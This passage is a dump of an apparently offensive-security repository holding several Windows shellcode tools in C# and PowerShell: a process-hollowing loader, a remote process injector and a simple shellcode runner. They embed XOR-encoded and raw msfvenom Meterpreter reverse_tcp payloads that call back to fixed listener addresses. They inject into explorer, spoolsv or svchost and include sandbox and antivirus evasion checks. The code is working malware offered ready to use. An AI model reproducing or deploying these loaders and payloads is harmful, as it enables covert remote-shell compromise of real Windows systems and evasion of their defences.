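            bool peHeadersOk = BitConverter.ToUInt16(dataBuf, 0x0) == 0x5a4d
                && BitConverter.ToUInt32(dataBuf, (int)e_lfanew) == 0x00004550
                && BitConverter.ToUInt16(dataBuf, (int)e_lfanew + 0x18) == 0x20b
                && rva != 0;
            if (!peHeadersOk)
            {
                // The suspended svchost.exe is left behind for the operator to clean up
                Console.WriteLine("PE headers of the suspended process did not validate (failed read or not a 64-bit image); aborting instead of writing blindly.");
                return;
            }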
            IntPtr entrypointAddr = (IntPtr)((Int64)executableAddress + rva);
            Console.WriteLine($"Got executable entrypoint address: 0x{entrypointAddr.ToInt64():x}.");

            // Carrying on, decode the XOR payload
            for (int i = 0; i < buf.Length; i++)
            {
                buf[i] = (byte)((uint)buf[i] ^ 0xfa);
            }
            Console.WriteLine("XOR-decoded payload.");

            // Overwrite the memory at the identified address to 'hijack' the entrypoint of the executable
            result = WriteProcessMemory(pInfo.hProcess, entrypointAddr, buf, buf.Length, out bytesRW);
            Console.WriteLine($"Overwrote entrypoint with payload. Success: {result}.");

            // Resume the main thread to trigger the payload (ResumeThread returns the previous suspend count, 1 here)
            uint rResult = ResumeThread(pInfo.hThread);
            Console.WriteLine($"Triggered payload. Success: {rResult == 1}. Check your listener!");
        }
    }
}
-------------------------------------------------------------------------------- /Shellcode Process Hollowing/Properties/AssemblyInfo.cs: --------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("Shellcode Process Hollowing")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Shellcode Process Hollowing")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("d8b2f4f4-2b59-4457-b710-f15844570997")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
-------------------------------------------------------------------------------- /Shellcode Process Hollowing/Shellcode Process Hollowing.csproj: --------------------------------------------------------------------------------
(XML markup lost in extraction; only the element values survived. They describe a standard Visual Studio .NET Framework project, tag names inferred from that template:
 OutputType Exe, ProjectGuid {D8B2F4F4-2B59-4457-B710-F15844570997}, RootNamespace Shellcode_Process_Hollowing, AssemblyName "Shellcode Process Hollowing",
 TargetFrameworkVersion v4.7.2, FileAlignment 512, Debug/Release configurations for AnyCPU (bin\Debug\, bin\Release\) and x64 (bin\x64\Debug\, bin\x64\Release\,
 PlatformTarget x64, LangVersion 7.3, Prefer32Bit true), DefineConstants DEBUG;TRACE / TRACE, DebugType full / pdbonly, ErrorReport prompt, WarningLevel 4.)
-------------------------------------------------------------------------------- /Shellcode Process Hollowing/Shellcode Process Hollowing.sln: --------------------------------------------------------------------------------
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30804.86
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Shellcode Process Hollowing", "Shellcode Process Hollowing.csproj", "{D8B2F4F4-2B59-4457-B710-F15844570997}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Any CPU = Debug|Any CPU
		Debug|x64 = Debug|x64
		Release|Any CPU = Release|Any CPU
		Release|x64 = Release|x64
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|x64.ActiveCfg = Debug|x64
		{D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|x64.Build.0 = Debug|x64
		{D8B2F4F4-2B59-4457-B710-F15844570997}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{D8B2F4F4-2B59-4457-B710-F15844570997}.Release|Any CPU.Build.0 = Release|Any CPU
		{D8B2F4F4-2B59-4457-B710-F15844570997}.Release|x64.ActiveCfg = Release|x64
		{D8B2F4F4-2B59-4457-B710-F15844570997}.Release|x64.Build.0 = Release|x64
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {21316190-097C-4FD2-A87D-733E0DA746F9}
	EndGlobalSection
EndGlobal
-------------------------------------------------------------------------------- /Shellcode Process Injector/App.config: --------------------------------------------------------------------------------
(XML contents lost in extraction)
-------------------------------------------------------------------------------- /Shellcode Process Injector/Program.cs: --------------------------------------------------------------------------------
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;

namespace RemoteShinject
{
    public class Program
    {
        [Flags]
        public enum ProcessAccessFlags : uint
        {
            All = 0x001F0FFF
        }

        [Flags]
        public enum AllocationType
        {
            Commit = 0x1000,
            Reserve = 0x2000
        }

        [Flags]
        public enum MemoryProtection
        {
            ExecuteReadWrite = 0x40
        }

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId);

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

        [DllImport("kernel32.dll")]
        static extern IntPtr GetCurrentProcess();

        // Heuristic: an elevated (high-integrity) token has BUILTIN\Administrators as its owner SID,
        // while the UAC-filtered token of the same user has the user's own SID
        static bool IsElevated
        {
            get
            {
                return WindowsIdentity.GetCurrent().Owner.IsWellKnown(WellKnownSidType.BuiltinAdministratorsSid);
            }
        }

        public static void Main(string[] args)
        {
            // Sandbox evasion: some sandboxes do not emulate VirtualAllocExNuma and return NULL
            // (compare against IntPtr.Zero; IntPtr is a value type and is never null)
            IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
            if (mem == IntPtr.Zero)
            {
                return;
            }

            // XOR-encoded payload, key 0xfa
            // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
            byte[] buf = new byte[511] {
                0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8,
                0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2,
                0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0,
                0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb,
                0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2,
                0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71,
                0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2,
                0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2,
                0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33,
                0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf,
                0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71,
                0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2,
                0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2,
                0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13,
                0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa,
                0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f,
                0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e,
                0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92,
                0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0,
                0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73,
                0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f,
                0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40,
                0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f,
                0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33,
                0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f,
                0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb,
                0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb,
                0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb,
                0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32,
                0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba,
                0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f,
                0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6,
                0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb,
                0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05,
                0x2f
            };

            int len = buf.Length;

            // Parse arguments, if given (process to inject into)
            string procName = "";
            if (args.Length == 1)
            {
                procName = args[0];
            }
            else if (args.Length == 0)
            {
                // Pick a target based on elevation level
                if (IsElevated)
                {
                    Console.WriteLine("Process is elevated.");
                    procName = "spoolsv";
                }
                else
                {
                    Console.WriteLine("Process is not elevated.");
                    procName = "explorer";
                }
            }
            else
            {
                Console.WriteLine("Please give either one argument for a process to inject, e.g. \".\\ShInject.exe explorer\", or leave empty for auto-injection.");
                return;
            }

            Console.WriteLine($"Attempting to inject into {procName} process...");

            // Decode the payload once, before the loop (decoding inside the loop would re-encode it on a retry)
            for (int j = 0; j < buf.Length; j++)
            {
                buf[j] = (byte)((uint)buf[j] ^ 0xfa);
            }

            // Get process IDs
            Process[] expProc = Process.GetProcessesByName(procName);
            if (expProc.Length == 0)
            {
                Console.WriteLine($"No running process named {procName} found.");
                return;
            }

            // If multiple processes exist, try them in turn until one injection succeeds
            for (int i = 0; i < expProc.Length; i++)
            {
                int pid = expProc[i].Id;

                // Get a handle on the process
                IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, pid);
                if (hProcess == IntPtr.Zero)
                {
                    Console.WriteLine($"Failed to get handle on PID {pid} (error {Marshal.GetLastWin32Error()}).");
                    continue;
                }
                Console.WriteLine($"Got handle {hProcess} on PID {pid}.");

                // Allocate RWX memory in the remote process
                IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
                if (expAddr == IntPtr.Zero)
                {
                    Console.WriteLine($"Failed to allocate memory in PID {pid} (error {Marshal.GetLastWin32Error()}).");
                    continue;
                }
                Console.WriteLine($"Allocated {len} bytes at address 0x{expAddr.ToInt64():x} in remote process.");

                // Write the payload to the allocated bytes
                IntPtr bytesWritten;
                bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten);
                Console.WriteLine($"Wrote {bytesWritten} payload bytes (result: {procMemResult}).");

                // Start a thread in the remote process at the payload address
                IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero);
                Console.WriteLine($"Created remote thread (handle {hThread}) at 0x{expAddr.ToInt64():x}. Check your listener!");
                break;
            }
        }
    }
}
-------------------------------------------------------------------------------- /Shellcode Process Injector/Properties/AssemblyInfo.cs: --------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("Shellcode Process Injector")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Shellcode Process Injector")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("e08baa9c-9d20-4c9a-8933-ec567f39f54c")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
-------------------------------------------------------------------------------- /Shellcode Process Injector/Shellcode Process Injector.csproj: --------------------------------------------------------------------------------
(XML markup lost in extraction; only the element values survived. They describe a standard Visual Studio .NET Framework project, tag names inferred from that template:
 OutputType Exe, ProjectGuid {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}, RootNamespace Shellcode_Process_Injector, AssemblyName "Shellcode Process Injector",
 TargetFrameworkVersion v4.7.2, FileAlignment 512, Debug/Release configurations for AnyCPU (bin\Debug\, bin\Release\) and x64 (bin\x64\Debug\, bin\x64\Release\,
 PlatformTarget x64, LangVersion 7.3, Prefer32Bit true), DefineConstants DEBUG;TRACE / TRACE, DebugType full / pdbonly, ErrorReport prompt, WarningLevel 4.)
-------------------------------------------------------------------------------- /Shellcode Process Injector/Shellcode Process Injector.ps1: --------------------------------------------------------------------------------
function LookupFunc {
    Param ($moduleName, $functionName)
    # Resolve a Win32 export without Add-Type: borrow GetModuleHandle/GetProcAddress from the
    # non-public Microsoft.Win32.UnsafeNativeMethods class in the GAC copy of System.dll
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp = @()
    $assem.GetMethods() | ForEach-Object { If ($_.Name -eq "GetProcAddress") { $tmp += $_ } }
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
}

function getDelegateType {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
        [Parameter(Position = 1)] [Type] $delType = [Void]
    )
    # Emit a delegate type with the given parameter and return types so the raw function pointer can be invoked
    $type = [AppDomain]::CurrentDomain.
        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
            [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
        DefineDynamicModule('InMemoryModule', $false).
        DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $type.
        DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).
        SetImplementationFlags('Runtime, Managed')
    $type.
        DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
        SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}

# Target the first explorer.exe instance (with several instances Get-Process returns an array, which would not cast to UInt32)
$procId = (Get-Process explorer)[0].Id

# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f ps1
[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x51,0x48,0x8b,0x52,0x20,0x56,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x8b,0x72,0x50,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x41,0x51,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x44,0x8b,0x40,0x20,0x8b,0x48,0x18,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x48,0x1,0xd0,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x1,0xbb,0xc0,0xa8,0x31,0x43,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5

# C#: IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, procId);
$hProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll OpenProcess),
    (getDelegateType @([UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke(0x001F0FFF, 0, $procId)

# C#: IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
$expAddr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAllocEx),
    (getDelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke($hProcess, [IntPtr]::Zero, [UInt32]$buf.Length, 0x3000, 0x40)

# C#: bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten);
$procMemResult = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WriteProcessMemory),
    (getDelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [IntPtr]) ([Bool]))).Invoke($hProcess, $expAddr, $buf, [UInt32]$buf.Length, [IntPtr]::Zero)

# C#: IntPtr threadAddr = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero);
# CreateRemoteThread takes seven parameters (hProcess, lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter,
# dwCreationFlags, lpThreadId); the delegate has to declare all of them, otherwise the native side reads lpThreadId from garbage
$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateRemoteThread),
    (getDelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke($hProcess, [IntPtr]::Zero, 0, $expAddr, [IntPtr]::Zero, 0, [IntPtr]::Zero)

Write-Host "Injected! Check your listener!"
-------------------------------------------------------------------------------- /Shellcode Process Injector/Shellcode Process Injector.sln: --------------------------------------------------------------------------------
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30804.86
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Shellcode Process Injector", "Shellcode Process Injector.csproj", "{E08BAA9C-9D20-4C9A-8933-EC567F39F54C}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Any CPU = Debug|Any CPU
		Debug|x64 = Debug|x64
		Release|Any CPU = Release|Any CPU
		Release|x64 = Release|x64
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|x64.ActiveCfg = Debug|x64
		{E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|x64.Build.0 = Debug|x64
		{E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|Any CPU.ActiveCfg = Release|x64
		{E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|Any CPU.Build.0 = Release|x64
		{E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|x64.ActiveCfg = Release|x64
		{E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|x64.Build.0 = Release|x64
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {04F2AB2E-4DA3-43DF-86FE-736580CBA9D4}
	EndGlobalSection
EndGlobal
-------------------------------------------------------------------------------- /Simple Shellcode Runner/App.config: --------------------------------------------------------------------------------
(XML contents lost in extraction)
-------------------------------------------------------------------------------- /Simple Shellcode Runner/Program.cs: --------------------------------------------------------------------------------
using System.Runtime.InteropServices;
using System;

namespace rev
{
    public class Program
    {
        public const uint EXECUTEREADWRITE = 0x40;      // PAGE_EXECUTE_READWRITE
        public const uint COMMIT_RESERVE = 0x3000;      // MEM_COMMIT | MEM_RESERVE

        [DllImport("kernel32.dll")]
        static extern void Sleep(uint dwMilliseconds);

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);

        // lpThreadId is an optional LPDWORD, so it is declared as IntPtr and passed as IntPtr.Zero
        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern Int32 WaitForSingleObject(IntPtr Handle, Int32 Wait);

        public static void Main()
        {
            // AV/sandbox evasion: sleep for 10s and check that the time really passed
            DateTime t1 = DateTime.Now;
            Sleep(10000);
            double deltaT = DateTime.Now.Subtract(t1).TotalSeconds;
            if (deltaT < 9.5)
            {
                return;
            }

            // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
            // XORed with key 0xfa
            byte[] buf = new byte[511] {
                0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8,
